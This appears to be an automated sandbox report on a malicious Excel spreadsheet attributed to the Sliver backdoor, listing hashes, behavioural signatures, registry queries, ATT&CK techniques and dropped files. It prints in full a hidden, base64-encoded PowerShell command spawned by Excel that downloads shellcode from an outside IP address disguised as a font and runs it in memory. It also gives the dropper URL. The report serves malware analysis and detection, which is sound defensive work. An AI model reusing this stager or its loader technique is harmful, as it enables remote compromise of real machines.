sliver | dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578

General

Target

dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
Size

46KB
MD5

a26cd351baea6159ea1979a56dad21db
SHA1

83ef2c3be02025d90d4d443cf3fe1fc84277fcb2
SHA256

dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578
SHA512

f42fe4fc3e7be31638c602ced0c9611a4f182f9f5bad82234d0df9872a58db5fd6980855237ca6078eabf90a6e2208f945d94442619a54fd7577d25c05700eb2
SSDEEP

768:D4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ESFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4448	5048	powershell.exe	82

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4448-61-0x0000014BC6B50000-0x0000014BC75CE000-memory.dmp	SliverRAT_v2
behavioral2/memory/4448-64-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp	SliverRAT_v2
behavioral2/memory/4448-65-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp	SliverRAT_v2
behavioral2/memory/4448-63-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp	SliverRAT_v2
behavioral2/memory/4448-62-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp	SliverRAT_v2
behavioral2/memory/4448-77-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 31 IoCs

Processes:

powershell.exe

flow	pid	Process
22	4448	powershell.exe
24	4448	powershell.exe
27	4448	powershell.exe
28	4448	powershell.exe
29	4448	powershell.exe
30	4448	powershell.exe
38	4448	powershell.exe
40	4448	powershell.exe
41	4448	powershell.exe
42	4448	powershell.exe
43	4448	powershell.exe
44	4448	powershell.exe
45	4448	powershell.exe
46	4448	powershell.exe
47	4448	powershell.exe
48	4448	powershell.exe
51	4448	powershell.exe
59	4448	powershell.exe
63	4448	powershell.exe
65	4448	powershell.exe
66	4448	powershell.exe
67	4448	powershell.exe
68	4448	powershell.exe
69	4448	powershell.exe
70	4448	powershell.exe
71	4448	powershell.exe
72	4448	powershell.exe
73	4448	powershell.exe
74	4448	powershell.exe
75	4448	powershell.exe
76	4448	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
4448	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
5048	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid	Process
4448	powershell.exe
4448	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	4448	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	Process
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE
5048	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	Process	procid_target
PID 5048 wrote to memory of 4448	5048	EXCEL.EXE	86
PID 5048 wrote to memory of 4448	5048	EXCEL.EXE	86
PID 4448 wrote to memory of 1168	4448	powershell.exe	89
PID 4448 wrote to memory of 1168	4448	powershell.exe	89
PID 1168 wrote to memory of 3604	1168	csc.exe	90
PID 1168 wrote to memory of 3604	1168	csc.exe	90

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4emgp0xc\4emgp0xc.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6EC.tmp" "c:\Users\Admin\AppData\Local\Temp\4emgp0xc\CSC7F2A56726914495AAF805BBBE23A9249.TMP"
      4⤵
      PID:3604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4emgp0xc\4emgp0xc.dll

Filesize
3KB

MD5
ab0f7e01cc8a2e72677da729a55d7de1

SHA1
5d42ff7ae15bf49111d9f3054494a2c21dec6fcf

SHA256
28e846521ed4952f59d52c0dcac9bd49b6d25a2e3a24629886f0f85b875631ad

SHA512
dcd277310d14514c2b23eb708410d2dc86103ad6c8608f60a93055d80884f3b6b2ee9fcda453c3cb175cb4d1a19e304b7dcc59d09837e11d5cbed3e4bee85664

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB6EC.tmp

Filesize
1KB

MD5
2309076648398dd0551356acdb46876a

SHA1
8f6001d57cb18818b30cd8a14602351eb6086a13

SHA256
1f26a9274a57b311bd67138ab4e7ca52074cf2046096daa8196350b479a9226d

SHA512
b9c1d16589787f067fc0974c4010ad16446414bd004616c9e5b684fd8dcfb854497dddeb36bea6a32ff97eb55c1f1559826ed8bd9789e4605e3d89469182f75e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_knwt00em.c3v.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
18106b380465a9d89db9fc44e189ad7f

SHA1
1084fbfd4533361ffc31f084011745ab0d72c633

SHA256
2e5376209f882b6b8ceea918ea5788a090504b2381da00b7cf1f10982df7f7a7

SHA512
7488b53c5df8f9d2107d45ca4a6ca176c5dffb900722d9dd52ec9e4e488799e0edc4956b8fe169d22e3eebdfb687df33240946c9134cfe10521f0eafd4871cb6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4emgp0xc\4emgp0xc.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4emgp0xc\4emgp0xc.cmdline

Filesize
369B

MD5
949464cfea40b0acf37b8184d48f8611

SHA1
959880fd712c989e1702968b63cf0b2d9fe9493d

SHA256
fe7c621f1d52d34eaa36a42178a9c8772e1f4c035d883dcd6ae8afe060e1dbd9

SHA512
daa609f2229af6512aeb697f8078831f606b9dd32a51e1cab9c1adc785d59687c52671235df5d67084738722c8d767ca00d1a8009519e18e3eca9ea04abf961d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4emgp0xc\CSC7F2A56726914495AAF805BBBE23A9249.TMP

Filesize
652B

MD5
2f0f08b7a9b06e9081fa7e49a6546d9d

SHA1
eb44d4934e405829985f0b47ef035c65640480b8

SHA256
4ba3ab56e84ae2f2d760dc1d677262ca01d98cc268709f2725d78ef20a05003b

SHA512
2eec05817cdb63404662aae5d1958f0f5aa78145547ee6e03430e36e3d64705b6298f49b4a43c9bfeac130b3e3d60d3cc7a041af1a3b7feb26486f534ec1626a

Download Submit
memory/4448-62-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp

Filesize
10.9MB

Download
memory/4448-56-0x0000014BC6220000-0x0000014BC6228000-memory.dmp

Filesize
32KB

Download
memory/4448-61-0x0000014BC6B50000-0x0000014BC75CE000-memory.dmp

Filesize
10.5MB

Download
memory/4448-64-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp

Filesize
10.9MB

Download
memory/4448-65-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp

Filesize
10.9MB

Download
memory/4448-63-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp

Filesize
10.9MB

Download
memory/4448-39-0x0000014BC6230000-0x0000014BC6252000-memory.dmp

Filesize
136KB

Download
memory/4448-77-0x0000014BC8050000-0x0000014BC8B36000-memory.dmp

Filesize
10.9MB

Download
memory/5048-8-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-9-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-16-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-18-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-24-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-28-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-15-0x00007FFA00170000-0x00007FFA00180000-memory.dmp

Filesize
64KB

Download
memory/5048-14-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-13-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-12-0x00007FFA00170000-0x00007FFA00180000-memory.dmp

Filesize
64KB

Download
memory/5048-11-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-17-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-1-0x00007FFA429ED000-0x00007FFA429EE000-memory.dmp

Filesize
4KB

Download
memory/5048-10-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-60-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-7-0x00007FFA029D0000-0x00007FFA029E0000-memory.dmp

Filesize
64KB

Download
memory/5048-5-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-6-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-3-0x00007FFA029D0000-0x00007FFA029E0000-memory.dmp

Filesize
64KB

Download
memory/5048-4-0x00007FFA029D0000-0x00007FFA029E0000-memory.dmp

Filesize
64KB

Download
memory/5048-66-0x00007FFA429ED000-0x00007FFA429EE000-memory.dmp

Filesize
4KB

Download
memory/5048-2-0x00007FFA029D0000-0x00007FFA029E0000-memory.dmp

Filesize
64KB

Download
memory/5048-75-0x00007FFA42950000-0x00007FFA42B45000-memory.dmp

Filesize
2.0MB

Download
memory/5048-0-0x00007FFA029D0000-0x00007FFA029E0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads